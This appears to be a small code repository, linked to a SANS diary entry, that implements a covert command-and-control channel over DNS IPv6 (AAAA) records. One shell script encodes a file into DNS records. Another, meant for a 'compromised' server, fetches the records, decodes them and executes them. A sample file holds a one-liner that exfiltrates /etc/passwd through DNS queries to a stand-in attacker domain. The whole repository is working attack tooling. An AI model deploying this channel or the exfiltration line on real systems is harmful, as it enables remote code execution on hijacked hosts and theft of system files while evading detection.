├── .gitignore
├── README.md
├── file2ipv6.sh
├── sample.txt
└── server.sh


/.gitignore:
--------------------------------------------------------------------------------
1 | .idea
2 | dns.key
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # IPv6DNSExfil
 2 | 
 3 | This script will create AAAA records that can be used as a C&C channel.
 4 | The output of the file2ipv6.sh script is intended to be piped to nsupdate,
 5 | which will then take care of sending the updates to the appropriate 
 6 | authoritative DNS server.
 7 | 
 8 | You will need to configure the correct DNS server in the script, as well as 
 9 | the zone you want to use for the C&C channel.
10 | 
11 | To run the script:
12 | 
13 | ```bash
14 | ./file2ipv6 sample.txt | nsupdate -k dns.key  
15 | ```
16 | 
17 | sample.txt is any file that you would like to encode. Typically a simple 
18 | text file with a shell command to be executed.
19 | dns.key is the update key for your DNS server. This is optional, and if you need it or not will depend on your name server configuration.
20 | 
21 | server.sh contains the oneliner that will execute the command on the compromised system.
22 | 
23 | More details: <https://isc.sans.edu/diary.html?storyid=21301>
24 | 


--------------------------------------------------------------------------------
/file2ipv6.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | n=2000
 3 | echo server 10.128.0.5
 4 | echo zone evilexample.com
 5 | echo update delete a.evilexample.com AAAA
 6 | for b in `xxd -p -c 14 $1 | sed 's/..../&:/g' | sed 's/:$//' `; do
 7 |  f=$n:$b
 8 |  f=`echo $f | sed 's/:..$/&00/'`
 9 |  f=`echo $f:0000:0000:0000:0000:0000:0000:0000:0000 | head -c39`
10 |  echo update add a.evilexample.com. 10 AAAA $f
11 |  n=$((n+1));
12 | done
13 | echo send
14 | 


--------------------------------------------------------------------------------
/sample.txt:
--------------------------------------------------------------------------------
1 | for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done
2 | 


--------------------------------------------------------------------------------
/server.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | # this script is intended to be run on the compromissed server
4 | # CHANGE THE DOMAIN FROM evilexample.com to something you own ;-)
5 | 
6 | `dig +short AAAA a.evilexample.com | sort -n  | cut -f2- -d':' | tr -d ':' | xxd -p -c 14 -r`
7 | 


--------------------------------------------------------------------------------